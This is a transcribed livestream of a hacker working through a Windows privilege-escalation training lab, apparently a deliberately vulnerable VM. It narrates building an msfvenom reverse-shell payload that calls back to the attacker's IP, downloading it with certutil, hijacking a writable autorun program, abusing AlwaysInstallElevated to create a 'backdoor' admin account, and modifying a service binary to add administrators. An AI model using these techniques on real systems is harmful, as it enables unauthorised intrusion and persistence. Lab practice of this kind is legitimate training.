and I have already done this one. The problem is either OBS or me or YouTube, somewhere along the lines, the sound went away. So we have to get back on this guy. We're going to do it again, and we're just going to go through them, and I'm going to take notes and everything at this time. So we're going to go ahead and do the Cyber Mentors Windows Priv Arena, and then from there we're probably going to do other Priv stuff. This was a 4-part series before, so I'm probably going to try and make it a 4-part series again because I had to replace all these videos with other videos on YouTube, which that is okay. But yeah, let's go ahead and remote desktop this guy, and we're going to try to start him off. Actually, you know what? We could technically, if you really want to, just use just Windows. We'll go ahead. We'll stay on Kali. Let's go ahead and remote desktop this guy. So we'll do a remina. And the IP address for this guy for us is going to be 10.10.188.13. Go and hop in there. Yes, we can see that the name is TCMPC. And we have user and password 321. So we got user, password 321. Alright, cool. We are hopping him. Looks like he's going to be a Windows 7 machine, it looks like. Ask me later. Exit out here. Then we'll go ahead and we'll get that guy as big as we possibly can for something like this. And we won't use any of his tools. We're going to use our own tools. Let's go ahead and go into PowerShell. At least I think we're not going to use any of his tools. We'll find out. Go ahead and hop into PowerShell. Do we have IEX-IWR with Windows 7? Okay, we do. Cool. Let's see here. We'll tab. Let's go ahead and just try to get power up on here. How about that? We'll see if we have IEX-IWR in here. Let's go ahead and try to get power up on here real quick. So we'll do a copy, or let's locate power up PS1 file, right? There we go. We'll take that. Oh, that's power up dev. I believe I have to maybe do a power up like that. There we go. We got some stuff here. Let's go ahead and copy that over into here. And let's go ahead and grab that guy. Let's do a Python server, Python 3, attack M, HTTP.server, and we'll put that on port 80 for right now. Hop back over in here, and we'll do a /powerup.ps1. And there we go. Okay, so no, it does not have IEX-IWR. So we may be actually running it on the actual machine itself. And if we're going to be doing that, there's no point doing wget if he already has the tools on here. All right. So yeah, we'll just do it like that. We could also try to look up how to run it in Windows 7 or something like that. But let's go ahead and start this guy off, right? So the very first thing we have is an auto run. Okay, so it says open command prompt, type C users, auto runs, auto-run64.exe. And auto runs, click on the log on tab. For the listed results, notice that my program entry is pointing at there, program.exe. Okay, let's go ahead. I'm going to go ahead and copy this actually. So this is part of, let me see here, that auto run program, that program.exe. It's actually part of something. It's not just some random crap that's thrown on here. So let's go ahead and actually look at that like, real quick. We probably figure out what it's actually part of. So we're going to C drive, right? There's computer, C drive, program files, was it? C, oh, users, user desktop, never mind. Users, user, desktop. So it's not his desktop, probably just minimize tools. And we have auto runs. Then we have auto run 64, okay? So this application is actually by, no thank you, user not found TV. Let's go ahead and go to properties for this guy. But you can actually download this auto runs like right here. And it can go ahead and see name of signer is Microsoft Corporation. Alright. So you can actually download this auto run 64 like right here. Sysinternals, that's what I want to say. Okay, it's part of the Sysinternals package. So if we say agree, there we go. We have this auto runs in here, right? And we got quite a few things in here. I also want to run power up just to see if power up shows us anything. But we're gonna kind of look through here. Alright. Got 7-zip. Image path and stuff like that, right? So we're looking for a program.exe, is that correct? Oh man. So it says to go ahead and do that, In auto runs, click on the log on tab. From the list of results, knows that my program entry is pointing to C program files auto run program.exe. So where's the log on tab? Okay, oh, log on tab. Okay, so when we log on, it looks like this is being ran. I would say program.exe, right? If we log in, then program.exe is being ran. I'm going to go with. Let's see if that's true. On the command prompt, type that. Check access. Okay. From the output, knows that everyone in the user group has access to that file. Okay, let's go ahead and do that like real quick. This is going to allow us to check access to it, right? For that file link right there. So we'll go ahead and we'll hop back over to PowerShell. May have to do it in command prompt for something like this. Can I copy and paste? Copy. Okay, there we go. I pasted it twice by accident. Agree again. Yep, sorry, I pasted it twice, I believe. Just going to try it one more time. And right click, enter. Okay, so there we go. And yes, read and write everyone file all access. So yes, that is very, very true. We do. Now let's go ahead and also throw that command over in here. There we go. Okay. So that W link right there was show only objects that have write access. V is very verbose. And then U is to suppress errors. That's what we just did like right there. We do have access to that guy, right? Let's go ahead and do Control-Shift print screen, and we will go ahead and throw this guy over into there, and we can see that we do have that access. Yes, we do have access to it. So everyone has access to that program.exe. So what we can probably do is overwrite that program.exe, I'm thinking. Is that what you're going to do here? Yep. We're going to overwrite that program.exe if it even actually exists. Let's find out. Because I'm going to auto runs, and I'm not seeing a program.exe in here. So that auto runs, actually, that program isn't even on there that's even supposed to be running. Because we have C program files. Oh, C program auto run program.exe. Okay, never mind. So we can go into C, the C drive, program files. We want to go to auto run program.exe. So this guy right here, we're probably going to overwrite him and put in something malicious into there, right? Let's go ahead and hop back over into my Kalian machine. And we'll do an MSF console or MSF Venom. Attack P, Windows, interpreter, reverse TCP, we'll do something like that. lhost equals 10.13.26.184. lport equals 4444. Attack F, it's going to be an executable file, and we're going to name that program.exe, right? Now, the reason we're doing that is because everyone has access, right? If we look at this, everyone has file access to this. Okay, to this file like right here. We ran something that Microsoft allows you to run, right? It's a sysinternal program like right there. Microsoft allows you to run it. We have file access to it. Everyone does. And so we might be able to overwrite it and actually, you know, like take it over kind of thing. So there's our file, right? So we get that file over there. Okay. Let's go ahead and do a wget, because wget should exist on here, right? wget 10.13.26.184 / program.exe, and we will do an out file of program.exe. wget doesn't exist on here. Okay, so nothing exists on the curl invoke run request. Cert util. There we go. We can do that. We can do cert util. Do we have cert util on here though? Let's find out. Let's see. Let's go to command prompt. Okay, we do. Oh wait, let me see. Okay, it looks like cert util is on there because it looks like it was trying to do something. So I think that's what we're gonna call it. Is that? So we're gonna call it program.exe. We are going to go to HTTP 10.13.26.184. Alright. I don't know what that attack split, I don't know what all that crap does, but we're just going to go ahead and leave it like that. And we're going to call it a day. Slash, I need to tell what we're actually downloading, huh? Supposedly I do at least. / program.exe. There, can we run that? It's online. Okay, we're getting somewhere. I kind of want to copy this whole freaking command right here, but I can't scroll over. There's some things in PowerShell I don't like. Let me go ahead and I'm just going to edit the properties here. I'm just going to make the font a little bit smaller for me so that I can actually see it. I can't actually see like what the heck's happening here. Did I say okay? I think I said okay. Font smaller. Alright, cool. So let me go ahead and get that. I know you guys can't see it right now, but I will change that out. Download program with cert util. Let's see if this program is actually downloaded also, because it has yet to reach back to us. Make sure that is my IP address, 10.13.26.184, 10.13.26.184. Make sure that, oh, that definitely says HTTPS though. You want to stop that? I'm just going to change that S to a, there we go, enter. Okay. Now we can go ahead and get this guy a little bigger for you guys again. And we'll go like 14 or something like that. Alright, so I think we did it. We did. Cool. So we have it now. We have that program.exe now. Now what we need to do is copy that program.exe over. And we can go ahead and save that program.exe, right? We need to copy that. So let's go ahead and copy that. Copy program.exe over to C. Program files. What was it? Auto run program. Overwrite it? Yes. Okay, so one file's been copied and we overran it. Write it, right? Now we can go ahead and we are going to log out and then we're going to log back in as the administrator. Alright, so we're going to log out, we're going to log back in as the administrator. At least that's what we should have to do if it's an auto run kind of thing. Place programs to simulate privilege escalation, log off and log back in. Yep, as administrator user. Okay. So TCM hacker123. So let's go ahead and let's get out of here. Exit out of there. Yes, please. We'll do a, I wonder if I can just do an R desktop. I don't really use R desktop very much. I don't think I need to tac Z though. Tac U, TCM, tac P, the password. And then the IP address, which is going to be 10.10.188.13. Let's go and try that. Yes, I do trust that certificate. Sure, why not? Now, when we come back in, ask me later. Okay. We should receive something since it's an auto run, supposedly, right? That says, do you want to run this program? Should. I should probably create a listener also, huh, on my actual own machine, huh? So let's go ahead and MSF console. Probably should have done that too. So let's go ahead and get that listener up and running. So I'm a little out of it like right now. Because I already did this, that's why. That's why I'm out of it. I already did it. Alright. I don't know what this new thing is with Metasploit. I don't know what the heck that is. Let's go ahead and use exploit multi-handler, set payload to Windows interpreter, reverse TCP, set the L host to ton 0, set the L port to 4444, I think it was, right? I think it was that, whenever we set up the first place. Yep. And let's go ahead and run that. And what's supposed to happen is once we log as this guy, that program should have actually ran. Should have. So let's see here. Because we have Place program in C program fill. I'll run program. Simulate privilege escalation effect. Log off and log back on as administrator user. Wait for a new session to open. And exploit session to confirm that the task succeeded. Okay. Oh, it did. Okay, there we go. Look at that, huh? So we did get that new session. There we are. Okay. Well, actually, before I even do that, let's go ahead and do a get UID. And we are TCM, right? Cool. So we got that to work, up and running. We are awesome. Everything is awesome. So there is part 1 done. Okay, so that program did run by itself on its own. Get system, see if we can do that or not. But it did run. So awesome. Okay, we cannot get system. That's okay. Let's go ahead and Control Z. Yes. Use or search for suggester. I know. Already going off track. Use 0. Show options. Set session to 1. Let's go ahead and run that. Let's see what we got. We're just going to let that run in the background while we're letting that run. Apple bench command line chili stopped working. Okay. Apache bench. So let's go ahead and get back into TCM, right? Or into user. So it was user and the password was password 321. Let's go ahead and get back into him and we will do always install elevated. All right, cool. So while that's opening up, let's see what else. Always install elevated. That's what we're in like right now. Yep. And then we'll do registry and executable files for tonight. So we're back in there, right? Let me go ahead and do registry and executable files. All right, awesome. So let's go ahead and take a look at always install elevated. I'm just gonna say, yay, we did it. Okay, cool. Always install elevated. So always install elevated. What this is going to do is whenever you install an MSI file, it's going to install elevated. We can see this with PowerUp actually. We can actually CD into, actually let's do a dir. Okay. Can you guys see that very well? Probably not, huh? Oh crap. That was minimize it and now it's about to go insane. Okay, you guys probably can't really see that very well. So let me go ahead and right click on it, properties, and get this a little bit bigger for you guys. Fonts, we'll go with like 18 or something like that. Okay. Okay. There we go. Should be able to see that now. All right. What's up, Frank? So now let's go ahead and CD into desktop, right? CD into tools. And we sure as hell we have our power up like right there, right? So let's CD into power up. And let's go ahead and actually go to PowerShell, TAC EP bypass. And we'll go ahead // powerup.ps1. There we go. All right. So that is now running. So now powerup.ps1 running, we can go ahead and we can do a invoke all checks. And powerup.ps1 should be able to find some different things in here. So we do have some unquoted service paths in here. Checking service executable and argument positions. Okay. What are we looking for like right now? We're looking for registry. Oh wait, are we looking for registry? What are we looking for? Oh, always install elevated. All right. So this is one way to do it. Okay, to see if we have always install elevated. We're going to go ahead and we are actually going to copy this also. Why am I copying this? Because I'm going to be taking the PMPT soon. I'm on my phone and I can read it. All right, cool. Awesome, Frank. So because I'm going to be taking the PMPT soon and I want to, in case PowerShell isn't working, in case I don't see things that I'm trying to see, things like that, I can always go and look at it somewhere else, right? Now let's see if always install elevated is on here. Unintended install files. We have unintended.xml. Checking for always install elevated registry key. Abuse function, right user, add MSI. So we do have it, right? Awesome. Oh, thank you very much. Sukaburio. Sukai. I'll call you Sukai. I messed that up bad, didn't I? Messed that up super bad. Thanks a lot for the raid. That's awesome. Let's do our little... Can I do that here? Does that work for me? No, I'm not that cool. All right, well, check him out because that was awesome. Thank you very much. All right, so we do have that always install elevated, right? Let's go ahead and grab this thing right here. Let's go ahead and copy and paste that. Okay, did not want to copy, that's okay. And we can write user add MSI. We'll hit enter on there. Is it? Is it case sensitive? I didn't think it was. We can try it. I think I'm just not cool enough. I also don't think I have it set up. Like, I don't think I'm... Oh, everything's going great. Everything is going absolutely wonderful. Doing some Windows Priv like right now. So, alright. So our output path is user add MSI. Right? Is that in the dir folder? Yes, it is. User add MSI. Okay, so now from here what we can do is we can go ahead and we can actually install this elevator, right? So we can also look at it through the command prompt too if we want to, right? Through reg query. But what we can do is we can put this in a different folder and then run it pretty much. Thank you very much. Thanks a lot for following also, okay? We put it in a different folder. We can run it with MSI execute and then the following command. Let's go ahead and do that. Let's go ahead and cd into C Windows temp. All right, yeah, let's put it in there. So we're going to copy to C Windows, copy user add MSI. User add MSI into C Windows. Why are you doing that? Because someone just rated me now. I got to mess up. C Windows temp, right? Okay, we'll copy that into there. Let's go ahead and cd into C Windows temp. Now the reason I'm doing it in temp is because usually we have write access to that, all right? Now what we should be able to do now is we should be able to run the following command like right here, this MSI execute. All right, quiet just means shut up, okay? And we're going to execute this setup.msi. All right, now ours is called add user MSI. That's okay. So let's go ahead and right click. And we're just going to say up and we're going to say add user or user add. User add.msi. And we'll go ahead and throw that in there. So let's go ahead and check out net user, see if we actually got a user. We have administrator, user, TCM. I'm not seeing anything, huh? Do we have to restart the machine maybe? Well, I kind of want to get rid of this quiet. Let's get rid of quiet, see what's actually doing here. Okay. So we're trying to get this guy, this user add MSI. What does that guy actually do though? I feel like I can make a different MSI file and make my life a lot easier. There we go. That's exactly what I want to see, like right there. Let's go ahead and do a little Googling here, right? Go ahead and see what the heck does that actually do. So this guy, he's actually making an MSI file. Let's go ahead and look up user add MSI power up. Let's see, what is it actually doing? Write user add MSI. Writes a precompiled MSI installer that prompts for a user group addition. This function can be abused. Okay. Write user. Okay. Tap pass string. Maybe we need to put a string in. Maybe we need to actually give it like a like who I want to add instead of just do that. You know. I've never really used the write user add MSI. Writes out precompiled MSI installer that gets the prompts for a user group addition. This function can be used to abuse get reg always install elevate. Example, write user add MSI. Writes the user add MSI to the local directory. Okay. But then how do I use it from there? PowerShell import, okay, power up, invoke all checks, boom, boom, uncode service path, got it, okay. We don't really want uncode service paths, we want MSI. Okay, so write user add MSI. user add MSI, dir, user add MSI. This creates user add MSI in the installer directory. We can then run in the installer. After everything is completed, we have an input form. We have to run an installer. Okay, let's go ahead and do that then. So, man, did I mess that shell up bad, huh? Yeah, it's in the process. We jacked that shell up bad. Let's go ahead and go back into PowerShell here. So I've never done that one before. I've done it on CD into C, Windows task, or temp, dir. Really? Fine then. CD back into C, users, user, desktop. CD tools. I think I have it in here, don't I? CD into power up. // user add MSI. Prepare to install. There we go. Okay, cool. Bash history obfuscation. That's my bash history obfuscation is when everything just freezes because it's Windows. So we are going to try to add a user, right, to the administrators group. That's what we're going to try to do at least. He has a little bit different way. Backdoor, password 123, group administrator. Sure, why not? Create it. Let's go ahead and go back into that user. And we now have a backdoor. All right. Net local group administrators. And backdoor is in there also. Boom. So let me go ahead and print screen this guy right here. Oh man, that's the one thing that I don't like about that, like right there. That's kind of crappy. Is that whenever you have a... Actually, can I click up here and do it? There we go. Okay, cool. So we wrote that user right. Boom. Actually, I only want all that. I want to kind of scroll down like a little bit. And I have in my notes that I actually did the user add MSI? No, I do not. Okay, let's go ahead and show that on power up again. User add MSI, and I can't like right now, can I? So let's go ahead and /power up.ps1 again. And we're going to go ahead. Oh my god, command prompt, PowerShell, tac EP bypass. /power up. /power up.ps1. There we go. Clear that out, and then we'll do a invoke all checks. We'll show it in here. Run power up. You can see a user add MSI module. You can run that module, then run the MSI, and create a new administrator user. So let's see if we can find it again. There it is, like right there. So if you can't print screen in our desktop, like I can't like right now, go ahead and just click on our desktop. You'll be able to print screen it, so you guys know. There's that, all right. So let's go ahead and do it one more time. Well, actually, I already have it on there, so let's do a dir. Let's go ahead and run that. / user add MSI. And there we go. Okay, Control Shift print screen. We got him. Boom. And that's going to say, forget about it, exit off here, cancel that. Okay, then we're just going to do a net user, and then net local group, because I already did it. Net local group administrators. And we have backdoor, and we also have, we have backdoor on there. So he has been created, and he's also in the administrators group now. So that has worked. That is always install elevated. We're going to go through registry and then executable files. I think that's going to be it for tonight. I've been at the beach all day. Then from there, we came back, went to the pool. So I'm a little tired. Let me grab a drink real quick. I will be right back. Give me a couple seconds here. I think I'm going to have some water. That's hey, Sukai Beru. What were you working with? What were you hacking? Were you hacking stuff, or what were you doing? Let's see here. Working on building some Azure. Okay, Active Directory open source intelligence tooling. Okay, cool. Are you on the GitHub streams? On the InfoSec GitHub streams? So, let's see here. Are you on this site, the InfoSec streams GitHub? Oh, you are? Okay. All right. Awesome. All right, cool. Awesome. All right, so there's always install elevated, right? Let's go and check out registry. So now we can look at registry services, right? Notice that the output suggests that the user belongs to these sort of interactive has full control permissions over the registry key. Okay. We can mess with registry services as long as we're allowed to, obviously. But this isn't usually something that usually you can do. This isn't really something that, you're going to find all the time opened up and things like that. So we're gonna do it, but this isn't always something you're gonna be able to do. Now, I don't think that power up actually shows us anything about registry services. So modify registry all runs and configs. Okay, it does. Run my program, C program, all run program.exe. No, that's the all run. That's that one like right there that we saw already, right? That's the auto run. Never mind. Registry auto run. Checking past potentially hijackable DLL locations. Checking service permissions. That's the DACL. That's later on down, I believe. That's not the one that we want to see, right? Like right now. Supposedly, right? Nope. Okay. I believe that one, we don't really go look at too much. Like right there. Running some PowerShell scripts to try and get some AD information. Looking at DNS records right now. I have most of the detecting, now looking and trying to find dynamics. Azure app, proxy, and storage accounts. Now I'm moving inside to authenticate discovery when I will be searching for service principles, etc. Nice. That's pretty cool. That's pretty awesome. Alright, we got a bunch of unquoted service paths like right here, things like that. But nothing that is for the, I don't think there's anything in here for the ACL services. So I don't think he's actually seen any of that like right there, right? So let's go ahead and look at this command like right here. Now this is going to be, I believe it's in PowerShell, that command. There we go. And there we are. Okay, so we have a Microsoft PowerShell core, blah, blah, H key. Okay, access is everyone, allow read key, NT authority interactive, allow full control, NT authority system, allow full control, built-in administrators, allow full control. So we obviously know that that's bad, right? Let's go ahead and print screen this like right here. And I'm also going to take a copy of that command like right there. We're going to go ahead and make sure that we can that we actually get that command in here also. So let's go into registry. And I actually want to take a print screen of this like right here. Boom. Alright. Whoopsie daisy. There we go. Alright. And then from here, so in the Kali VM, edit the text editor, compile the file, type of file. Boom, boom. Okay, so copy C users user desktop tools source Windows service.c to the Kali VM. Alright. We have to somehow get that over the Kali VM. Do we have Python on this box? We do not. So how the heck are we going to get this over to Kali VM? I mean, Cheo, I don't remember how I hurt you. Alright, let's go ahead, and we're still just trying to get this damn file. Alright, so we just cleared everything out of there, right? Let's go ahead and get back into him. We're going to our desktop back in this guy, right? There we go. Let's go ahead and actually make a malicious file over here. We do have that file. We have if FTP sucks, we're still gonna run FTP sucks here. Damn it, I keep calling it hacker 321, don't I? It's hacker 123. I remember how I hurt you. Oh, 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 oh. Okay. Looks good. There we go. Alright, let's go ahead and actually try to get it into in here. We got Metasploit still up and running, right? So let's go ahead and go into 10.13. Oh, let's go ahead and start a Python server actually. Python 3 TAC-M HTTP server on port 80, right? Let's go ahead and go to 10.13, 10.13.26.184. Enter. We're going to grab that FTP sucks, put it back on the desktop, we'll try to run it. We'll get there one day. Maybe the administrator can't use Internet Explorer, which technically that's how it should be, but we'll see. Oh, wow. 10.13.26.184, right? We did start a Python server, right? We do have, that is our IP address, right? You know what I like to do? Is I like to, oh yeah, I have the bash room, right? Yeah. So 10.13.26.184. 10.13.26.184. Okay. FTP sucks. Just showing some love. I'll be lurking because doing sysadmin things. That sounds horrible. I'm on leave this week. So, and next week. So I'll have to do anything. I was at the beach all day today. Went to the beach and then we went to the pool. Let's go ahead and run FTP sucks. Still not getting a reverse shell over here. Ah, there we go. Wahaha. So yeah, I'm thinking we just had too much stuff going on. Get UID. Alright, we are TCM, PC TCM. Let's go ahead and grab that file now. So let's go ahead and grab this C, users, desktop tools, source, Windows service.c. So we'll CD in there, CD into C. Windows, or C users, I mean. Users, user, desktops, tools, source, tools. I can't go into there, can I? I have to become someone else, don't I? I have to be the other guy, don't I? To actually be able to get in there. Let's go to shell. See if I can see it in there. Okay. Access denied. I am the administrator. How is the access denied? Alright, that's okay. Go ahead and exit out of here. Exit out of here, and we will start up another one. We will run it again. Alright. We will log out. And we will log in as user. Could you imagine being an administrator and you couldn't go to someone else's desktop? Like that. Like for reals? What's happening here? Is it going? That's the IP address, right? No, that's not the IP address anymore. Whoopsie daisy. Control C. Whoop whoop. That's the sound of the police. There we go. Even if you're an admin, you check the ACL. No, so this is the Windows Priv room, and what we have to do is we have to actually just download this file. The only problem is there's no Python. We can't get into the SMB. We might actually be able to get into the SMB. I think I just broke it last time for so many exploits. But we can't get into the SMB. We can't do anything really. And so there's an FTP server around here, but I don't know how the hell I actually start it. Or like to say, hey, to turn on the FTP server. But it's already installed out here. But yeah, all we need to do is we just need to grab this file for the next part of this. And yeah, we're just kind of stuck because I don't really know what to do. We can't really grab this file without, well, as far as I can see, without having a shell. But I'm pretty sure we could probably use FTP server. We could probably use different things. Just nothing was working before. But we did use quite a few exploits on it before, so that could have been something. No, there's no wget because the PowerShell is Windows 7 version, so there's no wget. So, all right, we're in here now. Okay, so let's go ahead and cd back. Where am I? We need to cd into tools, cd into desktop, tools, something with source, right? dir download Windows service.c. Alright, there we go. LSTAC LA. There is no invoke web request. There's no invoke web request. There's no the only way we're able to download stuff onto the machine so far, on the Windows machine, is with cert-util. That's the only way we've been able to do that for, and obviously through, you know, Internet Explorer. But that's the only way we've been able to do that so far. So we're just going to copy this file over, because in all honesty, in real life, we would be a user. We're trying to privilege, right? Yeah. Oh yeah, it's bad. It is bad. Like, if you just made a test and you want to be like, hey, how good are you at PowerShell? Just throw Windows 7 on there, really. That's really all you have to do. And the person's going to be screwed. Alright, there. So we do see, we ran this like right here, right? This get ACL path, boom, boom. And we can see if the registry is something that we can mess with. So we download that Windows service.c, right? Now what we need to do is we need to actually, well, first off, we need to sudo apt install, and I believe I actually already have this like right here. I think I do. Yeah, I already have it. But we do something to compile it, right? So what we need to do now is we are going to mess with this file like right here. So open the Windows service.c in a text editor, replace the command used by system boom function to command.exe, and then it looks like right here what we're going to do is we're actually going to add user to the administrators group. See, so we're going to do command.exe. We're going to execute net local group administrators. So we're going to make an administrator. In the group administrator, we're going to go to user. We're going to add him. Now, how I usually like to do this, because it's this way is confusing me, is I usually do a command.exe/k or whatever. Net local group administrators /add user, and that will also work too. You guys have seen me do that one before. If you watch these streams before, you've seen me do a lot of stuff with PowerShell and things like that. But we're not going to quite do it like that. We're actually going to make another user, and then we're going to add him to the local group. That's what my plan is. And I wonder if I can actually do it with, I want to try something real quick. So if I go to command prompt, right? Let's do a who am I ipconfig. I want to see if that will do anything. Okay, so who am I ipconfig. Can I do that? Is that going to run who am I and ipconfig? No, it just ran ipconfig. What I want to do is I want to add a user that put him into the administrators group. So that's what I want to do. So who am I ipconfig. Can I do something like this? I'll see how I would. Yeah, I didn't think so. Who am I? Who am I? I can't do that. ipconfig, right? I can't really do the pipe like right there, because it seems like it's only running one of those two commands, right? Doesn't seem like it's running that who am I. Who am I? Can I do it in PowerShell? Can we do a PowerShell and then do who am I? Who am I? Pipe ipconfig. Who am I? Semicolon ipconfig. Okay, so that'll work. So we can throw in the semicolon. So what we're going to do is we are going to do sublime text Windows service.c. Okay, so this system like right there is who am I, see Windows temp service.txt. We're going to delete that. We're going to say PowerShell.exe. Then we're going to say net user we'll say Ryan PSNSSW0RD1 / add that thing net local group administrators / add Ryan that net local group remote desktop users / add Ryan. And we're not going to actually put those guys, we're actually do like this. Okay. So that should add Ryan into all that stuff, right? And then we obviously need at the very end there, we need to do something like this. Boom. So we want that whole command in there. Let's go ahead and save that. And what we're going to do now is we are going to delete Windows service.c and we are going to upload Windows service.c. So we just upload our new Windows service.c to there, right? Now let's see if that actually works. I don't know if this is actually going to work or not. Okay. So place, so he said to call it, copy the file x.exe to Windows VM, place x.exe in C, temp, open the command prompt, boom, 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 sc start reg service. Okay. I'm going to leave it as is because it should start to run for like right there. Let's go ahead and do a shell. I'm going to say sc stop reg service, sc start reg service, net user. We'll see if Ryan got added. I wonder if we actually need to add this reg add hkn boom boom image path. Or if we need to do something like that. Definitely just deleted the thing, so I don't know if that was the right thing to do. But we could just do a bunch of Control Z's, huh? Let's go ahead and do that. Control Z. Sorry. Whoops. Oh god, oh god, oh god. Exit out here. Sublime text, Windows service.c. Oh god. We are just breaking this thing more and more and more, aren't we? Invoke PowerShell. We can see what he did. Look at that, huh? Look at what he did. We can see exactly what he did in there. That's pretty crazy. Alright, so I think I broke it. I think I broke the machine again. Let's go ahead and do this up here. But we're going to, instead of doing image path, we're going to say C. We're going to say this like right here. We're going to say that / Windows service.c. Yes. Overwrite it, yes. Let's stop reg service reg net start reg service. Oh! I think I broke it. Download reg service. Oh, I got here. Download register or download Windows Service C. Because we'll overwrite it, kind of, right? And then we can sublime that guy, right? Because we'll overwrite him, right? Or did I just? Do you want to reload it? Yes, reload it. Because now we can just kind of do like controls. Oh my god, we just keep getting rid of more and more stuff. Okay. So I can't control Z any more than that. So we're going to keep this. Save that. Control SSSS, file, save, do whatever you need to do, okay? Minimize off here. So it wants us to make a... Okay, at least we got that, right? Let's re-upload that now. Let's go ahead and upload that Windows service.c. Okay. So at least we got that now, right? So now let's go ahead and actually follow this guy along, okay? So we need to copy a generated file x.exe. Okay, so we need to do that to the Windows VM. So we need to get something like this, but we're not, I still don't want to use that. So let's go ahead and do a copy Windows service to x.exe. Sublime text x.exe. Right here, system, who am I? And that's saying C Windows temp service.txt. Okay. And I think what I want to do is actually do a little magic here. Because we would have to restart it. If we did that, then we'd have to restart it. You know what I'm saying? That's what my thing is like right there. So we want to do a command.exe /k, right? We want to run something, right? PowerShell tech EP bypass, okay? And then PowerShell tech EP bypass, we want to run a net user Ryan PSNSSW URD1 /add net local group administrators /add Ryan. Save that. Save. Okay, let's see what that does. Let's see if we can go ahead and throw this like right here. We already named it X, right? So let's go ahead and copy this guy, Control C, and we're going to place him in a temp directory, upload x.exe. Okay, and then we're going to do a shell. We're going to do a copy x.exe to C Windows temp. Okay, cool. And then we're going to run this guy right here. Boom. I'm going to say net stop reg svc. Net start reg svc. Since we cannot find the specified file. Find the file specified. CD and C temp. Okay, you're right, you cannot find it. Okay, exit, PWD, CD and C, temp. Did I do C Windows temp? Is that what's set up here? No, it's C temp, x.exe. Upload x.exe. Okay, shell, net start reg svc. System 216 errors occurred. That user. Alright, so that one didn't work right there. That's okay. Let's go ahead and sublime text that guy again. I wonder if I can just do a PowerShell.exe or something like that. Save that. Boom, boom. Okay. Let's go ahead and exit out here. We're going to try to re-upload it. Upload x.exe again. Let's go ahead and do a dir. Command prompt. Shell. Net stop reg service. Net start reg service. Net user. Okay, that's all right. I want to be able to run more than one command at a time. That's what the problem is. Who am I? ipconfig. I don't think I can run it like that, can I? Nope. ID thing on here? Who am I is definitely a thing though, that's the thing. But we can do it with PowerShell. So that's why I want to run it with PowerShell. Alright, so what we're going to have to do is, we could always try to make a reverse shell, but let's just go ahead and, I guess we'll add him in there, and then we'll just restart the box after that, I guess. So let's go ahead and add him in there. We'll just do what they want us to do inside the thing. Here, right, we'll go ahead and we'll just throw in this command.exe/k. Boom, boom, boom. Or how to add more commands onto or into CLI Windows. String commands together, CLI. String commands together, CLI Windows. Jesus. Windows. 2 commands in 1 line of Windows command line. Yes. And. That's what it is. And. Okay, let's try that. Let's see if that works. Shell. Who am I? And. Whoops. And. ipconfig. Do we have who am I in here? We do. Let's go. Alright, Sublime. X.exe. So we're going to do a we command.exe/k net user Ryan password /add and I also didn't put /add too. That might have been messing with it too. Save that. File, save. Okay. And let's go ahead and try to run that one. Let's go ahead and re-upload this guy. Upload x.exe. Cat x.exe. See what it says. Make sure it says the right stuff right. Okay, it looks like it. And then what we'll do is we'll go ahead and we'll get back into shell. Reg net start reg svc. System error 216 has occurred. Net user. Huh. First off, the TCM net user, say Bob, can he even do that? Well, there's one problem like right there. He can't even run that. And we're running it, I believe, as him. No, we're running it as a higher person, aren't we? Alright, let's go ahead and try it with just regular old freaking this one like right here. This is kind of making me angry. Let's try it with this. Hello, sweetheart. How are you? So we're going to try to add user into the local group, right? So I just saved him. We're going to go up to file and save just in case. Save, okay, and we'll go ahead and we'll do a reg net stop reg svc. It's not started. Okay, cool. Exit. Let's go ahead and do a upload x.exe. Do a directory. Okay, cool. I'm coming in there in a minute. Let's do I love you. Shell. Net start reg svc. System 260 errors occurred. Net local group administrators. Okay, so this one, that doesn't work. I mean, that's actually line for line copying it and everything. We're not even trying to do our own thing like right there. This one, it doesn't work. The reg service one. I feel like we already need to be an administrator to be able to do that. We have full control. Open in text editor. Yep, we did that. The command used by a system function to command /add. Exit text editor to compile the file. Do we still have to compile it? Would all of those have actually worked? I just didn't freaking compile them. We're going back to the first one I wanted to do. Are you kidding? Net user Ryan password 1/add and and net local group administrators STRA administrator / add Ryan. Okay, we're gonna try that. Now we need to freaking compile him. That's why we need the freaking compiler. No duh, Ryan. Let's go. All right. So we were actually supposed to mess with in Windows Service.c, which we did not. We actually messed with o.exe. So let's go ahead and actually mess with Windows Service.c. Let's go ahead and do a Sublime text for Windows Service.c. Let's go over to my x.exe, copy this. We'll go back over into here, Windows Service. We're going to throw this guy in there, Control V. Where's the other side of this thing also? Anybody else notice there's no other side of that thing? Like, it was going to mess up no matter what. Do that, save that. Let me file save. Actually do it like that. Let's compile him. Error. Expected before return. Did it still compiling? No, it did not. So I think I still can't X the up. So what does it say in the errors? Expected that guy before return. What? Like that? Is that what you're talking about? Now you compile? Hey-oh, you compile, okay. Now you notice that we can't just run them anymore, right? Or we can't just read them anymore. Upload x.exe. And let's go ahead and go back into the C temp. So we'll go ahead and go back into a shell. And we'll try to do a net stop reg svc, just in case it is actually started. Net start reg svc. Okay. Net user. So that didn't work for me now, did it? Net local group administrators. CRATORS administrators. So he did not add that user in. Net stop reg svc, which may have been my own fault. I may have messed up the damn command, right? Oh, I feel like I didn't. What the fuck is that? What the fuck is this? Add the payload here. What is this thing talking about, man? This is very confusing. Open Windows Service text error. Replace the command used by system function. System. I figured it'd be that one right there. I figured we'd add the payload like right there. Why the hell did it just totally change up? Command /K net user net local group administrators add Ryan. Save that. Okay. File. Save. Move tech RF x.exe. Let's go ahead and do that again, okay? Okay, that's how it works just fine, okay? Exit. Man, this is a tough one, huh? Alright, let's go ahead and go to shell. Net start reg svc. Taking a little bit longer, seems like, doesn't it? It's actually taking a lot longer. That user, we should see a new user in here. Ayo! There we go. Net local group administrators. Did I spell administrators wrong wherever I did it? Whatever, you know what? I think I spelled administrator wrong. Did I spell it wrong in here? Admin, S-T-R-A-T-O-R-S. No? Must not took that and. But that's okay, because we now have that guy, right? Now we have him, we can probably do a net local group administrators, in all honesty, but we haven't. Okay, we did something, right? Now let's go ahead and let's actually do it again. And we will make a net local group administrators for Ryan. All right, Command/K. Net local group administrators. I wonder if Windows 7 can't do that. Ryan/add. I wonder if it has to go like that with Windows 7. Administrators. Let's try. We'll say and. See if that and sign works. Net local group remote desktop users Ryan/add. We'll see if that and sign works. File, save that. We'll recompile this guy. We'll throw him back in there. We'll run him again. Okay, recompile that guy. Exit out of here, and let's go ahead and upload x.exe. Whoops. Okay, let's go ahead and shell, and let's go ahead and do a net stop reg service. Exit out of here. Please don't do this like right now. Net status reg service should be stopped, right? I thought net 